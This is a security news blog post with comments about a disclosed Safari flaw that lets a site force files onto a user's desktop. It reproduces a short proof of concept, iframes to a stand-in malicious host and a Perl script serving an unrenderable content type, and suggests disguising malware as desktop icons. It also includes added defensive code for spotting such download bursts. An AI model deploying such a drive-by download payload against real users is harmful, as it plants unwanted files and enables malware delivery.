Safari "Carpet Bomb" attack information released

Nitesh Dhanjani released information about some of his newest research on the Safari web browser this morning, and interestingly enough, Apple has decided NOT to fix some of the issues he presented.

Dhanjani reported three issues, as follows below from his blog:

1. Safari Carpet Bomb. It is possible for a rogue website to litter the user's Desktop (Windows) or Downloads directory (~/Downloads/ in OSX). This can happen because the Safari browser cannot be configured to obtain the user's permission before it downloads a resource. Safari downloads the resource without the user's consent and places it in a default location (unless changed).

Assume you visit a malicious site, http://malicious.example.com/, that serves the following HTML:

    <HTML>
    <iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
    <iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
    <iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
    ...
    <iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
    </HTML>

Now assume that http://malicious.example.com/cgi-bin/carpet_bomb.cgi is the following:

    #!/usr/bin/perl
    print "Content-type: blah/blah\n\n";

Since Safari does not know how to render a content-type of blah/blah, it will automatically start downloading carpet_bomb.cgi every time it is served. If you are using Safari in Windows, this is what will happen to your desktop once you visit http://malicious.example.com/:

[Screenshot: Safari Carpet Bomb]

The implication of this is obvious: Malware downloaded to the user's desktop without the user's consent.
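As an added example (not part of the article or of Dhanjani's research), here is a defender-side check for the pattern the screenshot shows: a burst of same-named files landing in the Downloads or Desktop folder within seconds. The "-1", "-2" de-duplication suffix and the sample listing are assumptions, not taken from the page.

```python
"""Detect a Safari-style "carpet bomb" burst in a download directory.
Added example, not from the original article. Browsers de-duplicate repeated
downloads as name-1.ext, name-2.ext, ... (assumed; adjust DUP_SUFFIX)."""
import os
import re
from collections import defaultdict

# "carpet_bomb-12.cgi" -> stem "carpet_bomb", ext ".cgi"
DUP_SUFFIX = re.compile(r"^(?P<stem>.+?)(?:-\d+)?(?P<ext>\.[^.]*)?$")

def normalise(name):
    """Strip the de-duplication counter so all copies share one key."""
    m = DUP_SUFFIX.match(name)
    return (m.group("stem") + (m.group("ext") or "")).lower()

def detect_bursts(entries, window_s=10, threshold=5):
    """entries: iterable of (filename, mtime_epoch_seconds). Returns one
    (normalised_name, count, first_ts, last_ts) per name that has at least
    `threshold` copies with timestamps inside a `window_s`-second span."""
    by_key = defaultdict(list)
    for name, ts in entries:
        by_key[normalise(name)].append(ts)
    hits = []
    for key, stamps in by_key.items():
        stamps.sort()
        best, start = None, 0
        for end, ts in enumerate(stamps):  # sliding window over sorted times
            while ts - stamps[start] > window_s:
                start += 1
            count = end - start + 1
            if count >= threshold and (best is None or count > best[0]):
                best = (count, stamps[start], ts)
        if best:
            hits.append((key, *best))
    return hits

def scan_directory(path, **kw):
    """Run detect_bursts over a real Downloads or Desktop folder."""
    with os.scandir(path) as it:
        entries = [(e.name, e.stat().st_mtime) for e in it if e.is_file()]
    return detect_bursts(entries, **kw)

# Constructed listing: one legitimate PDF an hour earlier, then 40 dropped
# copies landing within four seconds, as in the article's screenshot.
T0 = 1_213_000_000
SAMPLE = [("invoice.pdf", T0 - 3600)] + [
    ("carpet_bomb.cgi" if i == 0 else f"carpet_bomb-{i}.cgi", T0 + i * 0.1)
    for i in range(40)]
```

`scan_directory(os.path.expanduser("~/Downloads"))` runs the same check against a live folder; tune `window_s` and `threshold` to the download habits of the machine.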

Apple does not feel this is an issue they want to tackle at this time.

In my most recent email to Apple, I suggested that they incorporate an option in Safari so the browser can be configured to ask the user before anything is downloaded to the local file system. Apple agreed it was a good suggestion:

...the ability to have a preference to "Ask me before downloading anything" is a good suggestion. We can file that as an enhancement request for the Safari team. Please note that we are not treating this as a security issue, but a further measure to raise the bar against unwanted downloads. This will require a review with the Human Interface team. We want to set your expectations that this could take quite a while, if it ever gets incorporated.

[credit to BK have-it-your-way Rios for suggesting the term "Carpet Bomb" to describe this issue].

Let's hope Apple does add the suggestion Nitesh mentioned at least. I see this as a major security issue. Unless I'm off the mark, someone could create a piece of Malware, call it "My Computer", give it an icon that looked just like the "My Computer" icon, and litter it all over someone's desktop. My guess is that more than a few people would double click that, making this a serious issue.


Nitesh continues:

2. Sandbox not Applied to Local Resources. This issue is more of a feature set request than a vulnerability. For example, Internet Explorer warns users when a local resource such as an HTML file attempts to invoke client side scripting. I feel this is an important security feature because of user expectations: even the most sophisticated users differentiate between the risk of clicking on an executable they have downloaded (risk perceived to be higher) and clicking on an HTML file they have downloaded (risk perceived to be lower).

Apple's response was positive: ...we have been investigating the potential for a "safe" mode for local HTML. This is an area that requires a fairly deep investigation to address compatibility issues, and to determine the proper operation. Please understand that when we label this as a security hardening measure, we are not discounting the benefits that this could have.

Ok, with this one I'm happy with Apple's response and agree with their plan of action.

3. [Undisclosed]. The third issue I reported to Apple is a high risk vulnerability in Safari that can be used to remotely steal local files from the user's file system. Apple responded positively and let me know that they are actively working to resolve the issue and issue a patch. I will post an update if I hear back from them.

I'd like to thank the Apple security team for their timely responses and for letting me discuss these issues with the security community.

Apple's stance on some of these issues is concerning. For now, I'm forgoing my research on the Mac OS X because I'm afraid Nitesh is going to pwn my box.

-Nate

Topics: Operating Systems, Apple, Security

Talkback

37 comments
  • Apple products are very secure

    If I were Apple I would just not worry about this because as many Apple software users know, they are secure as secure can be. I would just laugh this guy off because the perception is in play in the market and who needs to mess with a perception when it trumps reality. There aren't many Apple users that would pony up the truth about security issues from Apple, because we all know security issues in software only applies to Microsoft products. Just be quiet and everything will go just fine.
    OhTheHumanity
    • Just let this strawman die, already

      Since no Mac user ever maintains what you think they do,
      you just look like a pathetic fool every time you and others
      like you bring it up.
      frgough
      • As long as you don't use it the next time ...

        ... a Windows security issue is in the news.
        Confused by religion
        • The zombie strawman

          MS apologists are the only ones who run around claiming
          Mac users state OS X is perfect.
          frgough
    • OS X fell first in the Pwn2Own because of Safari

      Safari is an abomination.

      1. An OS X box was owned within 2 minutes of being connected to the Internet because of the swiss cheese nature of Safari.

      2. By far the worst font rendering of any application I've ever used.

      3. By far the least stable application on my Vista box, I have the reliability logs to prove it.

      4. The only way Apple can get people to use Safari is to bundle it with OS X and perform stealth installs on Windows machines. Pretty disgusting tactics.
      NonZealot
      • By far the worst font rendering of any application I've ever used

        I disagree on this point. I don't like Safari, but I think its font rendering is beautiful.
        tehremo
      • Half the Story

        1. Vista fell to Flash. What's your point? All the attacks at Pwn2Own
        were local, and I remind everyone unlike Microsoft XP / Vista there
        has never been a documented remote exploit of OS X.

        Even so, the Pwn2Own "hack" was more social engineering than
        "hack". Had an actual human been at the controls it is doubtful the
        "hack" would have worked.

        2. Compared to what, ClearType? You do know that Microsoft's
        ClearType is just a re-filed expired Apple patent, right? To be
        exact, an expired patent covering the Apple II. Wow! That's some
        21st Century technology there!

        3. Then post them for the world to see, Joe McCarthy.

        4. Yes - it is so unlike forcing every hardware manufacturer to buy
        a copy of Windows no matter if the computers ship with it, or not.
        We all know Microsoft would never stoop to such tactics, right?
        1macgeek
        • @1mackeek -- Vista Fell to Flash

          Vista may have fallen to Flash, but the point is that Flash is NOT a Microsoft app. Safari is an Apple application, which is very concerning. They scream that they have better security. But why did their own application bring their operating system down?

          I love Apple just as much as the next guy, but they have got to stop with this "we're more secure" bull crap.
          rjohn05
          • Agreed

            I said it multiple times over, the biggest loser at Pwn2Own was the Mac, but they all lost. When your own software is what gets hit, you can't blame anyone but yourself.

            -Nate
            nmcfeters
          • Flash

            Keep in mind that Flash is included and active in a default install so that constitutes part of the standard risk level in my book. From a user standpoint, it doesn't matter who is to blame but whether you're at risk or not.
            pecosbill
          • Agreed

            But Flash is a standard install for a lot of OS, so it's tough to blame M$ for that.

            -Nate
            nmcfeters
        • @1macgeek

          You misunderstand things, you said:

          1. Vista fell to Flash. What's your point? All the attacks at Pwn2Own were local, and I remind everyone unlike Microsoft XP / Vista there has never been a documented remote exploit of OS X.

          Actually, this is a remote exploit. It can be done through cross-site scripting. In fact, all of the attacks used at Pwn2Own are remote. Browser attacks are remote. All it takes is planting the attack on a well visited site with XSS and game over you've hit thousands of users.

          You also said:
          Even so, the Pwn2Own "hack" was more social engineering than "hack". Had an actual human been at the controls it is doubtful the
          "hack" would have worked.

          That doesn't even make any sense at all. It was a browser attack, no social engineering required. Simply visit a page that deploys the vector. With XSS so widespread, this could be a site you visit every day.

          You said:
          2. Compared to what, ClearType? You do know that Microsoft's ClearType is just a re-filed expired Apple patent, right? To be exact, an expired patent covering the Apple II. Wow! That's some 21st Century technology there!

          Honestly, and this is not just to you, who gives a fuck about fonts?

          -Nate
          nmcfeters
          • NOT so sure about that it being S. E.

            The only thing the human did in Pwn2Own was click a link which could have been served up by a search engine. Did NOT have to come from an email (the SE vector). The rest was all code.
            pecosbill
          • Didn't even have to click

            They wouldn't have had to click if it was deployed through a persistent XSS in a site they visit anyways.

            -Nate
            nmcfeters
      • 2 minutes is pointless!!!!!

        On point one, the cracker/hacker CLEARLY had the exploit already found, set up, and ready to go. Nothing out there can be cracked in two minutes starting from scratch without some additional social engineering.

        Safari on OS X 10.5 potentially has less risk due to the messages that pop up (it sees an app and confirms you want to continue downloading plus it confirms new apps that were download should be allowed to run).

        Safari on Windows is definitely a critical risk! I have it here and don't plan on using it for any surfing except to gmail. I can see a TRIVIAL exploit as was said. Keep the download to a few icons so it's not too obvious, make it one of the obvious ones (My Comp, recy as said), and you're in. Very Baaaaaaad. With a little social engineering, you might get a vector on Safari/Win in two minutes!!!!
        pecosbill
  • You first (NT)

    No text
    iPad-awan
  • Safari is CRAP. Don't Use It.

    Safari is CRAP. I use Firefox on my macbook.
    GiveMeGizmos
  • one day and 2 minutes, actually. (n/m)

    .
    lostarchitect
  • Why would anyone use safari for windows?

    Safari for windows is so primitive, it's worse than lynx or mosaic from 1998. Why anyone would use that is beyond me.. except for the apple fanboys.
    kraterz
    • Define primitive then (nt)

      zkiwi